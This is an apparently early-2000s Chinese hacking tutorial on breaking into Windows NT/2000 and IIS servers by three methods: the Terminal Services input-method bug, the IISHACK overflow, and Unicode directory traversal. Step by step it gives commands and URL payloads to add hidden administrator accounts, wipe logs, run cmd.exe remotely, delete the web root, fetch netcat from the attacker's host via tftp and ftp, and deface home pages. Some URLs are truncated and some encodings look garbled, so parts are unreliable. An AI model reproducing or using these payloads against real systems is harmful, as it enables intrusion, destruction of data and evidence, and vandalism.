�iNT的各种漏洞利用法

/ns/cn/jc/data/20020811045514.htm

今天向大家介绍的是NT的终端服务入侵远程计算机、IISHACK远程溢出漏洞及用的最广泛的UNICODE漏洞！

攻击方法一：

NT的终端服务入侵远程计算机需要客户端软件也可以用基于WEB的客户端软件和一个端口扫描器（我这里的是HAKTEK，如果大家有扫描固定端口的扫描器也可以，直接扫描3389端口就可以了）还有一个操作系统扫描器Grinder.

目标主机必须条件：WIN2000的操作系统，开放远程3389端口及输入法漏洞

ACTION，打开Grinder输入一段IP地址扫描，嘿嘿，扫到一些NT的了
XXX.34.218.100 URL Present Microsoft-IIS/5.0
XXX.34.218.101 URL Present Microsoft-IIS/5.0
XXX.34.218.102 URL Present Microsoft-IIS/5.0
XXX.34.218.103 URL Present Microsoft-IIS/5.0
XXX.34.218.104 URL Present Microsoft-IIS/5.0

...........................................
...........................................

然后将IP地址逐个输入到HAKTEK里面扫描3389端口，没多上时间就可以找到一些了：

xxx.34.218.100

..............

NEXT，打开客户端软件（WEB的客户端也可以），输入IP地址确认，呵呵，对方的登陆屏幕出现在客户端里了，在用户名里输入几个任意字符，然后按Ctrl+shift键，将输入法转化为全拼模式，将鼠标放在状态条的全拼图标上按右键，然后在帮助选项的里面选择输入法入门（如果能弹出输入法入门的话，那就说明这个机器有输入法漏洞，如果没有的话，那就换台机器试试吧！）再然后就在这个页面的“选项”上按右键，在弹出的选项里选择跳至URL，在新弹出跳至URL的选项里输入c:\winnt\system32并确认，呵呵，出来了。

现在有两种方法可以攻击：

1.将对方c:\winnt\system32里的cmd.exe拷贝到c:\inetpub\scripts\ccc.exe 里面，然后在浏览器里用

http://xxx.34.218.100/scripts/ccc.exe?/c+dir

来进行攻击。这种攻击类似于unicode漏洞的攻击方法，后面要详细介绍的，现在就不赘述了。

2.在右边的窗口里选择net.exe文件，右键后选择创建快捷方式，然后就会生成一个net.lnk的文件，再就在这个文件上按右键选择属性，在弹出的新窗口里的目标里输入:

C:\winnt\system32\net.exe user sharpwinner/add

确认后，这个窗口就会消失，呵呵，不用慌张，这个net.lnk将这条命令加入到了它里面去了，然后你只要双击这个net.lnk,对方的计算机就会运行这条命令，然后我们将这个帐号加入到administrators组里面去:

C:\winnt\system32\net.exe localgroup administrators sharpwinner/add

呵呵，好，这一阶段的任务完成，关掉帮助等弹出的窗口，在客户端中输入帐号：sharpwinner，密码为空，Enter!哈哈，进去了，在目标计算机的c:\winnt\system32\里面将我们创建的net.lnk删掉，呵呵，立刻到日志文件下D掉所有的记录:c:\winnt\system32\logfiles

改主页就不用我再说了，呵呵，缺省的目录是c:\inetpub\wwwroot里面！

攻击方法二：

IISHACK攻击法需要工具：iishack (注：iishack.exe是攻击NT4.0的，iishack1.exe是攻击NT5.0的） netcat和tftp还有netdde

首先，将TFTP装到自己机器里面，将自己的机器变成一个FTP服务器。

然后，利用前面找到的nt机器xxx.34.218.100来进行攻击：

c:\iishack xxx.34.218.100 80 99

如果显示攻击成功的话，那就可以再输入：

c:\telnet xxx.34.218.100 99

呵呵，进去了，然后进入到对方的c:\winnt\system32\里面，输入：

c:\winnt\system32\tftp -i <自己的IP地址> get netdde.exe

然后再运行netdde.exe文件，建立一个帐号，将它的权限提升到administrators组：

c:\winnt\system32\netdde.exe net user make love /add

c:\winnt\system32\netdde.exe net localgroup administrators make /add

然后退出来，用net use \\xxx.34.218.100\ipc$ love /user:make 建立IPC连接，然后就不用我再说了吧 呵呵，上期已经讲过的。

攻击方法三：

攻击需要工具：rscan

UNICODE漏洞，呵呵，大家肯定都用过了吧，我这里利用方法和你们的不一样，不信就来看看：

关于UNICODE的原理由于时间原因，我就不讲了，现在先告诉大家不同语言系统的利用语句：

简体中文的NT4中编码为%c1%9c，简体中文的NT5.0的编码为%c1%1c，英文操作系统NT5.0的是%c0%af，在国外的一些网站中看到还有一些其他的编码：

%c1%pc

%c0%2f
%c1%1c
%c0%2f

%c1%1c
%c0%2f
%c0%2f
%c0%9v
%c0%qf
%c1%8s
%e0%80%af
%f0%80%80%af
%fc%80%80%80%80%af

有空大家可以测试。

我们现在就以简体中文的nt5.0或nt4.0的编码为例

先打开rscan工具，将编码的语句输入到里面去：（选择其中的一种）

/_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/scripts/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe

不多久，出来了一大排，呵呵，够了

然后，我们以/scripts/..%c1%1c../winnt/system32/cmd.exe为例来进行攻击。（注：..%c1%1c..%c1%1c..%c1%1c..是向上退出4层，..%c1%1c..是向上退出两层，我们缺省的目录是c:\inetpub\scripts，所以向上退出两层就可以了）

先给大家一个UNICODE攻击的工具集吧！

1.显示文件的内容（type命令）

http://x.x.x.x/scripts/..%c1%1c../w...:\redhacker.txt

2.删掉空的子目录（rd命令）

http://x.x.x.x/scripts/..%c1%1c../w...d+c:\badboy.txt

这些简单的就不用再说了，大家只要熟悉windows命令就可以了，我们来点cool一点的。

3.我们将c:\winnt\system32里面的cmd.exe改名并拷贝到c:\inetpub\scripts\ccc.exe，那我们就可以这样来显示对方硬盘了：

http://x.x.x.x/scripts/ccc.exe?/c+dir

4.查找主页的存放地（缺省情况下是放在c:\inetpub\wwwroot下的，但具我攻击的经验来看，缺省的情况很少，那么我们就用最快的方法来查找index.htm或index.html）

http://x.x.x.x/scripts/ccc.exe?/c+c...find.exe?/n+/v+""+c：（d盘e盘都可以试试）\xxx\*.ht*

4.批处理命令运用法（.bat)

http://x.x.x.x/scripts/ccc.exe?/c+echo+del /f /s /q c:\inetpub\wwwroot\*.* > sharpwinner.txt

http://x.x.x.x/scripts/ccc.exe?/c+echo+rd /f /s /q c:\inetpub\wwwroot

>> sharpwinner.txt(注：>是改写文件内容，>>是向文件中插入信息）

这样对方的C盘里的c:\inetpub\wwwroot目录和里面的文件都被删掉了。

5.attrib命令的用法（有的主机会将index.html文件设为只读或隐藏，所以我们就得用attrib命令来去除这些保护。

http://x.x.x.x/scripts/..%c1%1c../w...m32/attrib.exe? -r -h c:\inetpub\wwwroot\index.html

6.ftp的用法。

http://x.x.x.x/scripts/ccc.exe?/c+echo+open+*.*.*.*>redhacker.txt
http://x.x.x.x/scripts/ccc.exe?/c+echo+user>>redhacker.txt
http://x.x.x.x/scripts/ccc.exe?/c+echo+pass>>redhacker.txt
http://x.x.x.x/scripts/ccc.exe?/c+echo+get+srv.exe>>redhacker.txt
http://x.x.x.x/scripts/ccc.exe?/c+echo+bye>>redhacker.txt

这里的srv.exe就是nc99.exe

7.echo命令的用法（最后一步，是做什么？大家猜猜，呵呵，当然是篡改主页了，主页都不能改，那还做黑客啊，呵呵）

http://x.x.x.x/scripts/ccc.exe?/c+echo+hacked by sharpwinner >c:\inetpub\wwwroot\index.html

打开浏览器一看，index.html的内容变成了hacked by sharpwinner，嘿嘿，篡改成功。